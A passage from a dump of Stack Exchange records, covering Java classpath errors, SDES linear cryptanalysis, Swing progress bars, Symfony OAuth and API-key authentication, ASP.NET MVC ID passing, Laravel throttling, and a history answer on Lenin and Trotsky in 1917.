folder\n\nQuestion: I have created a simple Java program (1 java file that contains the main() ), and I've included all Jar files in the same directory as the .class file. It is giving the NoClassDefFoundError message.\nI've tried updating the Classpath to point to the directory, and I've also set \"-cp .\" to suggest that it look in the same directory as the .class file. However, the program still says it can't find the class def.\nAny thoughts on what I should do?\nComment: Which class, which jars, which code? Wat?\nComment: sorry for any confusion. My program is one java class that contains the main(). My program needs to reference several packages (*.jar). I hope this helps.\nComment: Problem solved: I had updated the classpath in the Windows OS, but I needed to run the Java program in a new Command window... so the new classpath would be active. thank you for your help!\nAnswer: Adding a folder tells java to look in that folder for .class files.\nYou can't reference .jar files via a folder name... Each .jar file's path must be listed on the CLASS_PATH explicitly.\nthis question's answer may be useful\nAnswer: When you try running a class from command line then a NoClassDefFound exception usualy means there is something wrong with your classpath.\nYou have explicitly define the classpath. You can do this in a few ways but the following way is the least prone to error:\nOpen a command shell and do the following:\n1.) set classpath = {path to class files};{path to jars}\n2.) java com.example.mainclass\nNote: Even if your classes path and jar path is the same you need to specify them explicitly.\nNote: If you have more then one jars place them in a folder say lib and add it to the classpath like: {path}\/lib\/* This will include all of the jar otherwise you have to specify them individually. \nReferences: https:\/\/javarevisited.blogspot.com\/2011\/01\/how-classpath-work-in-java.html\nAnswer: Import the following package:\n<code>Import java.lang.NoClassDefFoundError;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Java NoClassDefFoundError even when Jars in same folder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Extracting key bits from linear cryptanalysis equation for SDES\n\nQuestion: From the linear cryptanalysis of SDES, we get a linear equation consisting the K[1, 3] of the round key 1 and 2. From this how will I retrieve the key bit?\nHow do we solve the linear equation we get from the linear cryptanalysis to predict the key bits? \n\nThe 1 and 3 bits of the round key 1 and 2 are present in the final relation. Form this we apply the algorithm 1, as stated in the paper by Matsui on linear cryptanalysis(The second image)\n\nBut from this how do we predict the bits of the actual\/original key?\nComment: You need to provide more details to make a self contained question and provide the equation you are referring to. Don't expect others to do your work for you.\nComment: Tried to clear the question.\nAnswer: The attack, as stated in sections 6.2 & 6.3, actually can only recover the quantity\n$K_1[1,3]\\oplus K_2[1,3]$.\nWhat you would hope to do is, to use a similar approach via another high probability linear relation [usually there is more than one] and recover more relations between subkey bits. Eventually, the goal is recovering all the original key bits. Assuming enough relations between pairs of key bits are recovered, then you can use take one variable in each relation as an unknown, and use more plaintext\/ciphertext pairs, by brute forcing over those values, and select the values that give the highest bias. This is quite tiresome for DES.\nI suggest reading Howard Heys' tutorial on linear and differential cryptanalysis [google it], which now appears as part of Stinson's Crypto book (3rd ed.) as well, where a more clear examples of targeting subkey bits is given, for both linear and differential cryptanalysis.\n","meta":{"source":"crypto.stackexchange","title":"Extracting key bits from linear cryptanalysis equation for SDES","dup_signals":{}},"subset":"stackexchange"} +{"text":"JProgressBar too fast\n\nQuestion: I am trying to add a progress bar. everything works and i don't get any error. But the progress bar goes from 0% to 100% without even going through the values between it (I mean it's too fast, and the users are unable to see the progress bar blocks filling in)\n<code>pr = new JProgressBar();\n\n pr(0);\n pr(true);\n..\n\npublic void iterate(){\n\n while (i<=20000){\n pr.setValue(i);\n i=i+1000;\n try{\n Thread.sleep(150);\n }catch (Exception e){\n e.printStackTrace();\n }\n }\n }\n<\/code>\nWhen i button is clicked i call the <code>iterate()<\/code> method, and i expect it to update the progress bar progressively. instead it pauses for a while and then displays a full progress bar.\nHow can i solve this ?\n2.) I don't like the default blue color of the progress bar tabs. I need to change the color. I tried <code>pr.setForeground(Color.GRAY);\n pr.setBackground(Color.RED);<\/code> But it didn't work.\nComment: Use a [Swing Worker](http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/worker.html) because right now you are blocking GUI [`Event Dispatch Thread`](http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/dispatch.html) with sleep, thus you dont see the pause between increments. Please post [SSCCE](http:\/\/sscce.org) for better help sooner\nAnswer: The problem is, you're trying to update the progress within the context of the Event Dispatching Thread.\nThis basically means that while you are in you loop, the EDT is unable to process any paint request you are making.\nWhat you need to do is some how offload the work to a separate thread and update the progress bar as needed. The problem with this, is you should never update the UI from any thread other then the EDT.\nBut don't despair, you have a number of options, the best is using a Swing Worker\nUpdated with example\n\n<code>public class SwingWorkerProgress {\n\n public static void main(String[] args) {\n new SwingWorkerProgress();\n }\n\n public SwingWorkerProgress() {\n EventQueue.invokeLater(new Runnable() {\n @Override\n public void run() {\n try {\n UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName());\n } catch (ClassNotFoundException | InstantiationException | IllegalAccessException | UnsupportedLookAndFeelException ex) {\n }\n\n JFrame frame = new JFrame(\"Testing\");\n frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n frame.setLayout(new BorderLayout());\n frame.add(new TestPane());\n frame.pack();\n frame.setLocationRelativeTo(null);\n frame.setVisible(true);\n }\n });\n }\n\n public class TestPane extends JPanel {\n\n private JProgressBar pbProgress;\n private JButton start;\n\n public TestPane() {\n\n setBorder(new EmptyBorder(10, 10, 10, 10));\n pbProgress = new JProgressBar();\n setLayout(new GridBagLayout());\n GridBagConstraints gbc = new GridBagConstraints();\n gbc.insets = new Insets(4, 4, 4, 4);\n gbc.gridx = 0;\n gbc.gridy = 0;\n add(pbProgress, gbc);\n\n start = new JButton(\"Start\");\n gbc.gridy++;\n add(start, gbc);\n\n start.addActionListener(new ActionListener() {\n @Override\n public void actionPerformed(ActionEvent e) {\n start.setEnabled(false);\n ProgressWorker pw = new ProgressWorker();\n pw.addPropertyChangeListener(new PropertyChangeListener() {\n\n @Override\n public void propertyChange(PropertyChangeEvent evt) {\n String name = evt.getPropertyName();\n if (name.equals(\"progress\")) {\n int progress = (int) evt.getNewValue();\n pbProgress.setValue(progress);\n repaint();\n } else if (name.equals(\"state\")) {\n SwingWorker.StateValue state = (SwingWorker.StateValue) evt.getNewValue();\n switch (state) {\n case DONE:\n start.setEnabled(true);\n break;\n }\n }\n }\n\n });\n pw.execute();\n }\n });\n\n }\n }\n\n public class ProgressWorker extends SwingWorker<Object, Object> {\n\n @Override\n protected Object doInBackground() throws Exception {\n int i = 0;\n int max = 2000;\n\n while (i < max) {\n i += 10;\n int progress = Math.round(((float)i \/ (float)max) * 100f);\n setProgress(progress);\n try {\n Thread.sleep(25);\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n return null;\n }\n }\n}\n<\/code>\nComment: I am trying to extract some of the code from your example to my application. I am not sure as in what parts to copy\nComment: Start with everything, run it a few times, add some break points in or `System.out.println` statements so you can understand the flow. The two most important aspects are `ProgressWorker` and the code inside the `start` button's `ActionListener`\nComment: Oh, since when did you decide to use __try multi catch__? ;)\nComment: @MouseEvent Moved over to Java 7 several weeks ago, only chance to play with it ;)\nAnswer: Why do you iterate in <code>i=i+1000;<\/code>? Please try something like this:\n<code>public void iterate(){\n\n int i = 0;\n\n while (i<=100){\n pr.setValue(i);\n i=i+10;\n try{\n Thread.sleep(150);\n }catch (Exception e){\n e.printStackTrace();\n }\n }\n}\n<\/code>\nAlso you should use a <code>SwingWorker<\/code> or at least an extra <code>Thread<\/code>, but that was mentioned before.\nComment: @user1315906 http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/worker.html and http:\/\/docs.oracle.com\/javase\/tutorial\/uiswing\/concurrency\/interim.html\nComment: +1 `Thread.sleep` is a way to _simulate_ latency, for [example](http:\/\/stackoverflow.com\/a\/4637725\/230513), just don;t sleep on the EDT.\n","meta":{"source":"stackoverflow","title":"JProgressBar too fast","dup_signals":{}},"subset":"stackexchange"} +{"text":"Combining fos_oauth authenticator with single key authenticator\n\nQuestion: I set up two authentication methods for my api:\n\nPrivate token authenticator by following this tutorial\nFOSOAuthServerBundle system for access_token auth: https:\/\/github.com\/FriendsOfSymfony\/FOSOAuthServerBundle \n\nBoth works like a charm separately.\nI tried to combine those systems with this security config:\n<code>security:\n encoders:\n FOS\\UserBundle\\Model\\UserInterface: sha512\n\n role_hierarchy:\n ROLE_ALLOWED_TO_SWITCH: ~\n ROLE_SUPPORT: ~\n ROLE_ADMIN: [ROLE_SONATA_ADMIN]\n ROLE_SUPER_ADMIN: [ROLE_ADMIN, ROLE_SUPPORT, ROLE_ALLOWED_TO_SWITCH]\n\n providers:\n fos_userbundle:\n id: fos_user.user_provider.username_email\n api_key_user:\n id: security.user.provider.api_key\n\n firewalls:\n dev:\n pattern: ^\/(_(profiler|wdt)|css|images|js)\/\n security: false\n\n oauth_token:\n pattern: ^\/oauth\/v2\/token\n security: false\n\n api:\n pattern: ^\/api\n stateless: true\n simple_preauth:\n authenticator: security.authentication.authenticator.api_key\n fos_oauth: true\n\n main:\n pattern: ^\/\n form_login:\n provider: fos_userbundle\n csrf_provider: form.csrf_provider\n login_path: \/login\n check_path: \/login_check\n\n anonymous: ~\n logout:\n path: \/logout\n switch_user: true\n<\/code>\nIf I try to get an access token with this curl command:\n<code>curl \"http:\/\/localhost:8000\/oauth\/v2\/token?client_id=1_2rqa1al0trwgso8g8co4swsks48cwsckgc8cokswkcgos4csog&client_secret=25a78plm6c2ss044k4skckkwoo8kw4kcoccg8sg0skook4sgwg&grant_type=password&username=test&password=test\n<\/code>\nIt works an I get an access_token, but when I try to use it:\n<code>curl -X GET http:\/\/localhost:8000\/api\/changelogs.json -H \"Authorization: Bearer MmI2OWNkNjhjMGYwOTUyNDA2OTdlMDBjNjA1YmI3MjVhNTBiMTNhMjI0MGE1YmM3NzgwNjVmZWZmYWNhM2E4YQ\" | json_pp\n<\/code>\nI get:\n<code>{\n \"error\" : \"invalid_grant\",\n \"error_description\" : \"The provided access token is invalid.\"\n}\n<\/code>\nBy deactivating my single_preauth api key authenticator, it's works and I can access to my API.\nIt seems my api key authenticator block all another system.\nHere, my ApiKeyAuthenticator class:\n<code>class ApiKeyAuthenticator implements SimplePreAuthenticatorInterface, AuthenticationFailureHandlerInterface\n{\n private $userProvider;\n\n \/**\n * @param ApiKeyUserProvider $userProvider\n *\/\n public function __construct(ApiKeyUserProvider $userProvider)\n {\n $this->userProvider = $userProvider;\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function createToken(Request $request, $providerKey)\n {\n $apiKey = str_replace('Bearer ', '', $request->headers->get('Authorization', ''));\n\n if (!$apiKey) {\n throw new BadCredentialsException('No API key given.');\n }\n\n return new PreAuthenticatedToken('anon.', $apiKey, $providerKey);\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function authenticateToken(TokenInterface $token, UserProviderInterface $userProvider, $providerKey)\n {\n $apiKey = $token->getCredentials();\n $username = $this->userProvider->getUsernameForApiKey($apiKey);\n\n if (!$username) {\n throw new AuthenticationException('The provided access token is invalid.');\n }\n\n $user = $this->userProvider->loadUserByUsername($username);\n\n return new PreAuthenticatedToken(\n $user,\n $apiKey,\n $providerKey,\n $user->getRoles()\n );\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function supportsToken(TokenInterface $token, $providerKey)\n {\n return $token instanceof PreAuthenticatedToken && $token->getProviderKey() === $providerKey;\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function onAuthenticationFailure(Request $request, AuthenticationException $exception)\n {\n return new JsonResponse([\n 'error' => 'invalid_grant',\n 'error_description' => $exception->getMessage()\n ], 401);\n }\n}\n<\/code>\nBut I can't find why.\nHow to combine this two authenticator methods?\nThanks for help.\nAnswer: Finaly found how to handle it but not sure it's the better and proper way.\nDon't hesitate to suggest improvements on comments! ;)\nFirst of all, remove <code>fos_oauth<\/code> key from <code>security.yml<\/code> file. It should looks like:\n<code>security:\n firewalls:\n # [...]\n api:\n pattern: ^\/api\n stateless: true\n # This will handle both oauth access token and simple private token\n simple_preauth:\n authenticator: security.authentication.authenticator.api_key\n # [...]\n<\/code>\nOn <code>ApiKeyUserProvider::getUsernameForApiKey<\/code> method, you will search on both custom api key manager and OAuth access token manager.\nThe complete class should look like this.\n<code>class ApiKeyUserProvider implements UserProviderInterface\n{\n \/**\n * @var UserManagerInterface\n *\/\n private $userManager;\n\n \/**\n * @var ApiKeyManager\n *\/\n private $apiKeyManager;\n\n \/**\n * @var AccessTokenManagerInterface\n *\/\n private $accessTokenManager;\n\n \/**\n * @param UserManagerInterface $userManager\n * @param ApiKeyManager $apiKeyManager\n * @param AccessTokenManagerInterface $accessTokenManager\n *\/\n public function __construct(UserManagerInterface $userManager, ApiKeyManager $apiKeyManager, AccessTokenManagerInterface $accessTokenManager)\n {\n $this->userManager = $userManager;\n $this->apiKeyManager = $apiKeyManager;\n $this->accessTokenManager = $accessTokenManager;\n }\n\n \/**\n * @param string $apiKey\n *\n * @return string|null\n *\/\n public function getUsernameForApiKey($apiKey)\n {\n \/\/ FOSOAuth system\n $token = $this->accessTokenManager->findTokenByToken($apiKey);\n if ($token) {\n return $token->getUser()->getUsername();\n }\n\n \/\/ Private key system\n return $this->apiKeyManager->getUsernameForToken($apiKey);\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function loadUserByUsername($username)\n {\n return $this->userManager->findUserByUsername($username);\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function refreshUser(UserInterface $user)\n {\n throw new UnsupportedUserException();\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function supportsClass($class)\n {\n return 'FOS\\UserBundle\\Model\\User' === $class;\n }\n}\n<\/code>\nAnd voila! Both Private and OAuth token are correctly managed.\nComment: merci for sharing your solution. Can you please share also with the complete declaration of the the services `security.authentication.authenticator.api_key` and the one related to the user provider. Merci beaucoup\nComment: One more question: how did inject `ApiKeyManager`?? I search in the service container and I did not find it! Have you created it by yourself?\n","meta":{"source":"stackoverflow","title":"Combining fos_oauth authenticator with single key authenticator","dup_signals":{}},"subset":"stackexchange"} +{"text":"Passing ID from one view to another and storing it in another table\n\nQuestion: I have a create page for adding a festival and a page for a user to create an event for that festival. I am trying to pass the festivals id from and store it in my events table. It gets caught on the post back of the create page. Here is the code:\nController:\n<code>[HttpGet]\n public ActionResult Create2(int festID)\n {\n EventsVM events = new EventsVM { festivalID = festID };\n\n events.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n events.eType.Add(-1, \"----- Add New Event Type -----\");\n\n events.eventsDate = DateTime.Now;\n events.startTime = DateTime.Now;\n events.endTime = DateTime.Now;\n\n return View(events);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken]\n public ActionResult Create2(EventsVM model)\n {\n if (ModelState.IsValid != true)\n {\n if (model.selectedEType != -1)\n {\n \/\/db.save stuff from create.\n Events Newevent = new Events();\n Newevent.EndTime = model.endTime;\n Newevent.StartTime = model.startTime;\n Newevent.EventsDate = model.eventsDate = DateTime.Now;\n Newevent.EventsName = model.EventsName;\n Newevent.EType = db.EType.Where(p => p.ID == model.selectedEType).Single();\n Newevent.Location = model.Location;\n \/\/Caught here!!!\n Newevent.FestivalID = model.festivalID;\n\n db.Events.Add(Newevent);\n db.SaveChanges();\n return RedirectToAction(\"Details\", \"Festival\", new { id = model.festivalID });\n \/\/return RedirectToAction(\"Index\", \"Festival\");\n \/\/return RedirectToAction(\"Index\", \"Events\");\n \/\/String test = \"test3\";\n }\n ModelState.AddModelError(\"\", \"No Event Type Picked\");\n }\n\n model.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n model.eType.Add(-1, \"----- Add New Event Type -----\");\n model.eventsDate = DateTime.Now;\n model.startTime = DateTime.Now;\n model.endTime = DateTime.Now;\n\n return View(model);\n }\n<\/code>\nI have to \"saved\" Festival ID on the details page of the selected festival id\nDetails.cshtml - Festival\n<code> <div>\n<h3>Details for Festival: @Model.FestivalName.ToString()<\/h3>\n<\/div>\n<hr \/>\n<div class=\"table-responsive\">\n<!--<div class=\"table\">-->\n <table class=\"table\">\n <tr>\n <th>\n Festival Name\n <\/th>\n <th>\n Start Date\n <\/th>\n <th>\n End Date\n <\/th>\n <th>\n Town\n <\/th>\n <th>\n County\n <\/th>\n <th>\n Festival Type\n <\/th>\n <th>\n Options\n <\/th>\n <\/tr>\n <tr>\n <td>\n @Html.DisplayFor(model => model.FestivalName)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.StartDate)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.EndDate)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.FestivalTown.Name)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.FestivalCounty.Name)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.FType.FType)\n <\/td>\n <td>\n <div class=\"btn-group\">\n @* <button class=\"btn btn-info btn-sm dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">Options<\/button>*@\n <button type=\"button\" class=\"btn btn-info btn-sm dropdown-toggle\" data-toggle=\"dropdown\">\n <span class=\"caret\"><\/span>\n <\/button>\n <ul class=\"dropdown-menu\">\n <li role=\"presentation\" class=\"dropdown-header\">Festival<\/li>\n <li>@Html.ActionLink(\"Edit\", \"Edit2\", new { id = Model.FestivalId })<\/li>\n <li>@Html.ActionLink(\"Back to List\", \"Index\")<\/li>\n <\/ul>\n <\/div>\n <\/td>\n <\/tr>\n <\/table>\n<\/div>\n@if (Model.Events != null)\n{\n <center><div class=\"well well-sm\" style=\"width:400px\">@Model.FestivalName.ToString() has @Model.Events.Count() Events<\/div><\/center>\n @Html.ActionLink(\"Add Event\", \"Create2\", \"Events\", new { festID = Model.FestivalId }, new { @class = \"btn btn-primary\"})\n <br \/>\n <br \/>\n <!--<div class=\"table-responsive\">-->\n <div class=\"table\">\n <table class=\"table table-striped\">\n <tr>\n <th>Events Name\n <\/th>\n <th>Events Date\n <\/th>\n <th>Start Time\n <\/th>\n <th>End Time\n <\/th>\n <th>Options\n <\/th>\n <\/tr>\n\n @foreach (var e in Model.Events)\n {\n <tr>\n <td>\n @Html.DisplayFor(modelItem => e.EventsName)\n <\/td>\n <td>\n @Html.DisplayFor(modelItem => e.EventsDate)\n <\/td>\n <td>\n @Html.DisplayFor(modelItem => e.StartTime)\n <\/td>\n <td>\n @Html.DisplayFor(modelItem => e.EndTime)\n <\/td>\n <td>\n <div class=\"btn-group\">\n <button type=\"button\" class=\"btn btn-success btn-sm dropdown-toggle\" data-toggle=\"dropdown\">\n <span class=\"caret\"><\/span>\n <\/button>\n <ul class=\"dropdown-menu\">\n <li role=\"presentation\" class=\"dropdown-header\">Event<\/li>\n <li role=\"presentation\" class=\"divider\"><\/li>\n <li>@Html.ActionLink(\"Edit\", \"Edit2\", \"Events\", new { id = e.ID }, null)<\/li>\n <li>@Html.ActionLink(\"Details\", \"Details\", \"Events\", new { id = e.ID }, null)<\/li>\n <li>@Html.ActionLink(\"Delete\", \"Delete\", \"Events\", new { id = e.ID }, null)<\/li>\n <\/ul>\n <\/div>\n <\/td>\n <\/tr>\n }\n\n <\/table>\n <\/div> \n}\n<\/code>\nThe error I get is when it posts back, the id in the link becomes a 0, so its not saving the id. Any id on how I can fix this?\nComment: Where? I already have it in the link of the post back in the create page?\n return RedirectToAction(\"Details\", \"Festival\", new { id = model.festivalID });\nComment: This is the error I get also : The parameters dictionary contains a null entry for parameter 'festID' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult Create2(Int32)' in 'MyFestival.Controllers.EventsController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter.\nComment: that error is because you are passing a null value to the method action, if the value you are pasing is going to be null sometimes you can change your method parameter to Create(int? id) or Create(int id = 0) for optional parameter.\nAnswer: Here is the answer @Overmachine\n<code> [HttpGet]\n public ActionResult Create2(int festID)\n {\n EventsVM events = new EventsVM { festivalID = festID };\n\n events.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n events.eType.Add(-1, \"----- Add New Event Type -----\");\n\n events.eventsDate = DateTime.Now;\n events.startTime = DateTime.Now;\n events.endTime = DateTime.Now;\n\n return View(events);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken]\n public ActionResult Create2(EventsVM model, int festID)\n {\n if (ModelState.IsValid != true)\n {\n if (model.selectedEType != -1)\n {\n \/\/db.save stuff from create.\n Events Newevent = new Events();\n Newevent.EndTime = model.endTime;\n Newevent.StartTime = model.startTime;\n Newevent.EventsDate = model.eventsDate = DateTime.Now;\n Newevent.EventsName = model.EventsName;\n Newevent.EType = db.EType.Where(p => p.ID == model.selectedEType).Single();\n Newevent.Location = model.Location;\n \/\/Caught here!!!\n Newevent.FestivalID = model.festivalID = festID;\n\n db.Events.Add(Newevent);\n db.SaveChanges();\n \/\/Change the model.festivalID to Newevent.FestivalID\n return RedirectToAction(\"Details\", \"Festival\", new { id = Newevent.FestivalID });\n \/\/return RedirectToAction(\"Index\", \"Festival\");\n \/\/return RedirectToAction(\"Index\", \"Events\");\n \/\/String test = \"test3\";\n }\n ModelState.AddModelError(\"\", \"No Event Type Picked\");\n }\n\n model.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n model.eType.Add(-1, \"----- Add New Event Type -----\");\n model.eventsDate = DateTime.Now;\n model.startTime = DateTime.Now;\n model.endTime = DateTime.Now;\n\n return View(model);\n }\n<\/code>\nComment: what did you change? you just copy my answer\nComment: I added this:\n\n Newevent.FestivalID = model.festivalID = festID;\nComment: @Overmachine I did add your code at first, but I got a 404, so I just add a bit of code to see would it work and it did, but thanks for helping me.\nAnswer: The id is 0 because you are passing the model.ID not the entity id which EF generate after the SaveChanges (propagating changes into database) and add to the ObjectSet. So, the Id will be automatically filled for you. change your code to this.\n<code>[HttpPost]\n[ValidateAntiForgeryToken]\npublic ActionResult Create2(EventsVM model)\n{\n if (ModelState.IsValid != true)\n {\n if (model.selectedEType != -1)\n {\n \/\/db.save stuff from create.\n Events Newevent = new Events();\n Newevent.EndTime = model.endTime;\n Newevent.StartTime = model.startTime;\n Newevent.EventsDate = model.eventsDate = DateTime.Now;\n Newevent.EventsName = model.EventsName;\n Newevent.EType = db.EType.Where(p => p.ID == model.selectedEType).Single();\n Newevent.Location = model.Location;\n \/\/Caught here!!!\n Newevent.FestivalID = model.festivalID;\n\n db.Events.Add(Newevent);\n db.SaveChanges();\n \/\/Change the model.festivalID to Newevent.FestivalID\n return RedirectToAction(\"Details\", \"Festival\", new { id = Newevent.FestivalID });\n \/\/return RedirectToAction(\"Index\", \"Festival\");\n \/\/return RedirectToAction(\"Index\", \"Events\");\n \/\/String test = \"test3\";\n }\n ModelState.AddModelError(\"\", \"No Event Type Picked\");\n }\n\n model.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n model.eType.Add(-1, \"----- Add New Event Type -----\");\n model.eventsDate = DateTime.Now;\n model.startTime = DateTime.Now;\n model.endTime = DateTime.Now;\n\n return View(model);\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Passing ID from one view to another and storing it in another table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set Throttle property with name property in single route\n\nQuestion: I am presently using below code in route in Laravel 8.\n<code>use App\\Http\\Controllers\\Annonymous\\Login\\API\\LoginAPIController;\nRoute::post('\/authenticate', [LoginAPIController::class, \"authenticateUser\"])->name(\"apiAuthenticateUser\");\n<\/code>\nLike there is name property, Is there any way to set middleware also for throttle along with name property? Something like this?\n<code>use App\\Http\\Controllers\\Annonymous\\Login\\API\\LoginAPIController;\nRoute::post('\/authenticate', [LoginAPIController::class, \"authenticateUser\"])->name(\"apiAuthenticateUser\")->throttle(\"10, 1\");\n<\/code>\nAnswer: Yes, throttle is a middleware so you would do the following\n<code>Route::post('\/authenticate', [LoginAPIController::class, \"authenticateUser\"])->name(\"apiAuthenticateUser\")->middleware('throttle:10, 1');\n<\/code>\n","meta":{"source":"stackoverflow","title":"Set Throttle property with name property in single route","dup_signals":{}},"subset":"stackexchange"} +{"text":"What were Lenin's and Trotsky's roles in the October revolution of 1917?\n\nQuestion: Lenin spend the two months preceding the overthrow of the provisional government far away from Saint-Petersburg\/Petrograd or Moscow - even the official Soviet version of events openly and readily admitted that he arrived to the revolutionary headquarters at Smolny Institute in the last moments before the government overthrow.\nIn the same time, Trotsky apparently orchestrated the revolution1 (of which the attack on the Winter palace was only the last act) - by assuring control of the media and the communications,s getting the support of the military and workers, and planning the action in details. As the chairman of the Petrograd Soviet Trotsky also held the political power. (This part was obviously hushed down in the Soviet discourse, but is routinely referred to in western descriptions.)\nNaively, it seems that Trotsky was the man calling the shots - therefore it is not obvious why he would allow Lenin to play any important role at all (honesty, chivalry and party discipline are all good, but power is power.) Or perhaps he even didn't intend to let Lenin in - as Trotsky was made to control both the foreign affairs and the army in the new government, which might suggest that Lenin was just a figurehead (this is not unlike the preceding government, where Kerensky was the real strongmen, while not being the prime-minister.)\nIs my assessment of their relative power\/influence supported by the evidence? What else accounts for the outcome?\n\n1 E.g., here is the recap of the situation from Marxism after Marx by David McLellan (emphasis mine):\n\nBy mid-September Lenin - still in Finland - wrote to the Central Committee: \"The Bolsheviks, having obtained a majority in the Soviets of workers and soldier deputies of both capitals, can and must take State power into their own hands.\" Most of the Party leaders still in Russia, mindful of the July defeat, were loath to take Lenin's suggestion seriously and he went as far as threatening to resign from the Central Committee and appeal to the ordinary members in order to stir them to the decisive action, which he only finally managed to implement by coming to St Petersburg in person in Mid-October. Even so, such influential members as Zinoviev and Kamenev (and they were not alone) continued to oppose insurrection and even publicized the split (and thus Lenin's intentions) in print. But the plans for insurrection meticulously prepared and supervised by Trotsky, had their own momentum and when the Provisional Government attempted to close certain Bolshevik papers on 24 October the Bolshevik seizure of power began, a seizure which, at least in its initial stages, must be one of the easiest and least bloody in history.\nComment: @MCW As is, a possible answer is that my assessment of the relative influence Lenin and Trotsky is incorrect. Perhaps, the title should be more towards asking about how big was the influence of each of them or whether there was any struggle for power between them. I am not sure how this could be expressed in a short sentence - if you have suggestions, I am ready to consider them.\nAnswer: Short Answer\nLenin and Trotsky were entirely involved in the events of October 1917, particularly if those events were classified as a coup and not a revolution. Trotsky was a leading \"organizer on the ground,\" while Lenin was the undisputed leader and essence of the Bolshevik Party.\nLong Answer\nTo understand how Russian revolutionaries related to major unrest in Imperial Russia, it's worth noting how things had unfolded in prior events.\nRussian revolutionaries tended to be out of touch with initial uprisings. The typical peasant revolts of old times generally had no political aims, and the unrest of the universities and even the lead-up of the revolution of 1905 were pedantic in nature: society began to snap at certain hot-button yet confined issues, for example, food strikes or university students wanting to get the police to loosen up on them.\nThe revolutionaries pulled a lot of theory from German idealists, which arguably did not help them much. German idealism and philosophy, such as that of Marx and others, of the late 1800s was esoteric and convoluted. The main effect was that as their theories ran like a rabbit through the woods, any listener would eventually hear what they wanted to hear to confirm their own beliefs. To the Russian revolutionaries, they took away some bits of theory of political revolution that would never occur in Russia. Their efforts to stoke a peasant uprising on these theories in the 1870s fell flat on its face because of this disconnect. When an uprising would occur, such as the 1899 university strikes, the revolutionaries would at first sit on the benches and play down the event because it was not in accordance with their German-derived doctrine. When the uprising showed signs of serious traction, they would then leap into action, try to wrest control of it (usually by setting up a leadership committee in the epicenter) and try to attach grand political aims to the movement. Usually these grand political aims, like overthrowing the monarchy, would alienate the masses involved and leave the revolutionaries stuck between a rock: the slow and ham-fisted government, and a hard place: an obstinate populace.\nThus the revolutionaries, including Lenin's Bolshevik Party - a party that he built and cast his entire life into - \"missed\" the Revolution of February 1917. In that case, the stresses of the war combined with a government that was completely out of touch with realities on the street came to a head due to weather: the winter had been unusually cold and food supplies dwindled, but a warm snap in February allowed everyone to turn out and vent their frustrations. Food strikes rapidly flared up and led to a serious rebellion among the troops (the troops being recent drafts who cared more about their grievances from their peasant days than being soldiers in the present). The Tsar's government was paralyzed against the mass rebellion and resigned.\nNote that in February, Lenin was in Zurich. His diary of that winter showed frenetic yet unfocused efforts: pamphlet publishing, intriguing against the Swiss SD's, and studying Marx and Engels. He did not know of the seriousness of the revolution until the Duma had assumed power. He frantically plotted to return to Russia, and in the mean time sent cables to his associates in Russia with orders: Lenin was fearful that his colleagues would negotiate or find an agreement with the new government.\nFollowing the abdication of the Tsar and during the days of the Provisional Government, a power vacuum formed that Lenin was desperate to seize. His initial strategy, from April to July, was to take to the streets with armed force and emulate in deed (but not in spirit) the events of February. This effort did not succeed and the Bolshevik Party almost collapsed in July. Going back to the drawing board, a more insidious plan was developed from August that put on a facade of hosting the Congress of Soviets (the bait), while focusing on a plan to have the party's armed wing seize certain centers of power by force (the coup). The facade of seeking to transfer power to the soviets was more of Trotsky's project.\n\nTrotsky was an ideal complement to Lenin. Brighter and more\nflamboyant, a much better speaker and writer, he could galvanize\ncrowds: Lenin's charisma was limited to his followers. But Trotsky\nwas unpopular with the Bolshevik cadres, in part [...] because he was\nunbearably arrogant. [..] During the Revolution and Civil War he was\nLenin's alter ego, an indispensable companion in arms: after victory\nhad been won, he became an embarrassment.\n\nPipes, The Russian Revolution, pg 439.\n\nTrotsky's skill as a public whip began to place the Provisional Government - seriously weakened after the Kornilov Affair - on the horns of a dilemma with the upcoming Congress of Soviets. The strategy was expressed by Trotsky:\n\nIn essence, our strategy was offensive. We prepared to assault the\ngovernment, but our agitation rested on the claim that the\n[government] was getting ready to disperse the Congress of Soviets and\nit was necessary mercilessly to repulse him.\n\nPipes, The Russian Revolution, pg 485.\n\nThe coup itself was exemplified by events of the night of October 24:\n\nThat night [], the Bolsheviks systematically took over all the\nobjectives of strategic importance by the simple device of posting\npickets: it was a model modern coup d'etat as described by Malaparte.\nIunker guards were told to go home: they either withdrew voluntarily or\nwere disarmed. Thus, under cover of darkness, one by one, railroad\nstations, post offices, telephone centers, banks, and bridges fell\nunder Bolshevik control. No resistance was encountered, no shots\nfired.\n\nPipes, The Russian Revolution, pg 491.\n\nFor Lenin's part, he is given credit because the Bolshevik Party was his and he was the Party. His life was so entwined with it that little material exists of who Lenin the Person was. However, he was not directly front and center during the coup: the disaster of July caused him to go into hiding and to make no public appearances until late October. While in 